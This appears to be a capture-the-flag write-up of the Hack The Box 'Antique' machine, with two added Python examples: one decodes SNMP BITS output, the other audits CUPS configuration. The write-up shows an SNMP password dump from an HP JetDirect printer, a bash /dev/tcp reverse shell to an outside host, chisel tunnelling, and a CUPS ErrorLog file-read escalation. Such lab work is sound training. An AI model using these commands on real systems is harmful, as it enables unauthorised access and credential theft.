Enumeration
I ran nmap and found port 23 open.
┌─[user@parrot]─[~/htb/antique]
└──╼ ports=$(nmap -p- -T4 -Pn -n 10.129.106.56 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
┌─[user@parrot]─[~/htb/antique]
└──╼ echo $ports
23
┌─[user@parrot]─[~/htb/antique]
└──╼ nmap -sC -sV -Pn -p$ports 10.129.106.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 11:00 BST
Nmap scan report for 10.129.106.56
Host is up (0.038s latency).

PORT   STATE SERVICE VERSION
23/tcp open  telnet?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270:
|     JetDirect
|     Password:
|   NULL:
|_    JetDirect
User flag
A quick Google search reveals that HP JetDirect is a printer, and that it has a known vulnerability: CVE-2017-2741.
Searching further for this vulnerability and how to exploit it, I found this page, which explains how to attack an HP JetDirect printer and dump the password.
First I confirmed that SNMP is running on port 161/udp:
┌─[user@parrot]─[~/htb/antique/exploits]
└──╼ sudo nmap -sV -sC -sU -p161,162 10.129.106.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 13:00 BST
Nmap scan report for 10.129.106.56
Host is up (0.039s latency).

PORT    STATE  SERVICE  VERSION
161/udp open   snmp     SNMPv1 server (public)
162/udp closed snmptrap
SNMPv1 is running, so I tried to dump the password by executing the command from the page linked above:
┌─[user@parrot]─[~]
└──╼ snmpget -v2c -c public 10.129.106.56 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
The command worked and dumped the password in hexadecimal. I converted the hex to ASCII with xxd; any online hex/ASCII converter or CyberChef does the same, it is just personal preference.
┌─[user@parrot]─[~]
└──╼ echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135" | xxd -r -p
P@ssw0rd@123!!123�q��"2Rbs3CSs��$4�Eu�WGW�(8i IY�aA�"1&1A5
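The numbers after the first 17 bytes are not more hex: snmpget prints a BITS value as its octets followed by the positions of the set bits (bit 0 being the most significant bit of the first octet), and piping the whole line into xxd decodes those positions as hex as well, which is where the trailing garbage after the password comes from. The following is an added example, not part of this write-up, that parses a printed BITS value properly by finding the split point at which the trailing numbers equal the set bits of the leading octets. BITS_LINE is constructed from the snmpget output above.

```python
# Added example: parse the value net-snmp prints for a BITS object.
# Format: "<hex octets> <indices of set bits>", where bit 0 is the MSB of
# octet 0. Every index is also a plausible hex byte, so the boundary is found
# by consistency rather than by token shape.

# Constructed from the snmpget output in the write-up above.
BITS_LINE = (
    "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 "
    "1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 "
    "54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 "
    "119 122 123 126 130 131 134 135"
)


def set_bit_positions(data):
    """Indices of set bits, numbered MSB-first across the octets."""
    positions = []
    for i, byte in enumerate(data):
        for b in range(8):
            if byte & (0x80 >> b):
                positions.append(i * 8 + b)
    return positions


def split_bits_value(line):
    """Split the printed value into (octets, set_bit_indices).

    Tries each prefix length n: the first n tokens are read as hex octets,
    the rest as decimal bit indices; the split is accepted when the indices
    are exactly the set bits of those octets.
    """
    tokens = line.split()
    for n in range(1, len(tokens) + 1):
        try:
            octets = bytes(int(t, 16) for t in tokens[:n])
        except ValueError:
            break  # a token is not a single hex byte; longer prefixes cannot work
        try:
            tail = [int(t, 10) for t in tokens[n:]]
        except ValueError:
            continue  # remaining tokens contain hex letters, so not indices
        if set_bit_positions(octets) == tail:
            return octets, tail
    raise ValueError("no consistent octets/bit-index split found")


def decode_password(line):
    """Return only the octet part of the BITS value, decoded as ASCII."""
    octets, _ = split_bits_value(line)
    return octets.decode("ascii")


if __name__ == "__main__":
    octets, bits = split_bits_value(BITS_LINE)
    print(len(octets), "octets;", len(bits), "set bits")
    print(decode_password(BITS_LINE))
```

Running it prints the 17-octet password with no trailing noise, which is the result xxd would have given had only the octet tokens been piped into it.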
Knowing the password, I connected via telnet and got the user flag:
┌─[✗]─[user@parrot]─[~/htb/antique]
└──╼ telnet 10.129.106.56
Trying 10.129.106.56...
Connected to 10.129.106.56.
Escape character is '^]'.

HP JetDirect

Password: P@ssw0rd@123!!123

Please type "?" for HELP
> exec whoami
lp
> exec ls
telnet.py
user.txt
>
Root flag
For convenience I want a proper shell, so let’s launch a reverse shell from the target.
> exec bash -c 'bash -i >& /dev/tcp/10.10.14.93/4444 0>&1'
I received the shell on the netcat listener and upgraded it to a proper TTY:
┌─[user@parrot]─[~]
└──╼ nc -lnvvp 4444
[...]
lp@antique:~$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
lp@antique:~$ export TERM=xterm
export TERM=xterm
lp@antique:~$ ^Z
[1]+  Stopped                 nc -lnvvp 4444
┌─[✗]─[user@parrot]─[~]
└──╼ stty raw -echo; fg
lp@antique:~$
After running linpeas.sh I found port 631 open, but only on localhost:
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      1149/python3
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -
tcp6       0      0 ::1:631                 :::*                    LISTEN      -
There are other privilege-escalation candidates, such as the sudo version or polkit (CVE-2021-4034), but the machine creator probably wants us to explore port 631, so let’s do that.
I used chisel, a tool that lets us set up a tunnel to the target machine. First I downloaded the binary and copied it to the target:
┌─[user@parrot]─[~]
└──╼ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
[...]
┌─[user@parrot]─[~]
└──╼ gunzip chisel_1.7.7_linux_amd64.gz
[...]
┌─[user@parrot]─[~]
└──╼ python3 -m http.server 8080

# download it on the target
lp@antique:~$ wget http://10.10.14.93:8080/chisel_1.7.7_linux_amd64
[...]
Now that the target has the binary, I can create the tunnel. First I started a chisel server on my machine:
# on my machine
┌─[user@parrot]─[~]
└──╼ ./chisel_1.7.7_linux_amd64 server -p 9000 --reverse
The chisel server now listens on port 9000; the --reverse flag allows reverse tunnels, so that a client can open a listening port on our machine. Next I connect from the target:
# on the target
lp@antique:~$ ./chisel_1.7.7_linux_amd64 client 10.10.14.93:9000 R:9001:localhost:631
On the client side (the target), we tell chisel to connect to our machine at 10.10.14.93:9000 and to open a listener on my machine on port 9001 (“R:9001:localhost:631”, a reverse tunnel). Any traffic that hits port 9001 on my machine is forwarded by chisel to the target and delivered from there to port 631 on the target’s localhost.
Now we can reach the web interface by browsing to localhost:9001.

The target is hosting CUPS, an open-source printing system, and the page shows that the CUPS version is 1.6.1.
I searched for vulnerabilities in CUPS 1.6.1 and found this page, which explains a root file read vulnerability.
It says you must be in the “lpadmin” group to exploit the vulnerability, so I checked whether the user lp is in that group:
lp@antique:~$ groups
lp lpadmin
The user is in the “lpadmin” group, so I can exploit the vulnerability as this user.
The vulnerability consists in changing the ErrorLog path: when we visit the error log page in the web interface, the cupsd daemon (running with setuid root) reads the file at the ErrorLog path and echoes it as plaintext. I will try to point it at the root flag and make CUPS echo that file.
I searched Metasploit and found this module. Looking at it, I noticed it runs the following command to change the ErrorLog file:
lp@antique:~$ cupsctl ErrorLog=/root/root.txt
Next, the exploit requests the error log page from the web interface, which returns the contents of the ErrorLog file, so I can make the same request with curl and check the output:
lp@antique:~$ curl http://localhost:631/admin/log/error_log
b6791365258a05b70f09ec24e27630de
Cool! That’s the flag! 🙂
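From the defender’s side, the cupsctl change leaves a durable footprint: the ErrorLog directive in cupsd.conf (cups-files.conf on newer CUPS releases) now points outside the log directory, and that is what an integrity or configuration audit should flag. The following is an added example, not part of this write-up or of CUPS itself, that checks a configuration for exactly that condition. SAMPLE_CONF is a constructed configuration and ALLOWED_LOG_DIRS is an assumed site policy.

```python
# Added example: audit a CUPS configuration for an ErrorLog directive that
# points outside the expected log directory. Not part of CUPS or the write-up.
import re

# Constructed sample of a cupsd.conf after the ErrorLog change described above.
SAMPLE_CONF = """\
LogLevel warn
MaxLogSize 0
# ErrorLog /var/log/cups/error_log   (commented-out default)
ErrorLog /root/root.txt
Listen localhost:631
"""

# Assumed site policy: where the error log is allowed to live.
ALLOWED_LOG_DIRS = ("/var/log/cups/",)


def find_error_log(conf_text):
    """Return the path from the last active ErrorLog directive, or None.

    Comments are stripped first, so a commented-out directive is ignored;
    if the directive appears more than once the last one is reported.
    """
    path = None
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"ErrorLog\s+(.+)$", line, re.IGNORECASE)
        if m:
            path = m.group(1).strip().strip('"')
    return path


def error_log_is_suspicious(conf_text, allowed_dirs=ALLOWED_LOG_DIRS):
    """True when ErrorLog is set to a file outside the allowed log directories.

    An unset directive (CUPS default) or the literal 'syslog' is legitimate
    and is not flagged.
    """
    path = find_error_log(conf_text)
    if path is None or path == "syslog":
        return False
    return not path.startswith(allowed_dirs)


def audit_report(conf_text):
    """Human-readable one-line verdict for the configuration."""
    path = find_error_log(conf_text)
    if error_log_is_suspicious(conf_text):
        return "ALERT: ErrorLog redirected to %s" % path
    return "ok: ErrorLog is %s" % (path or "default")


if __name__ == "__main__":
    print(audit_report(SAMPLE_CONF))
```

On a live system the same check would be run against the real configuration file and, ideally, combined with a file-integrity monitor on the CUPS configuration directory, since cupsctl rewrites that file when the directive is changed.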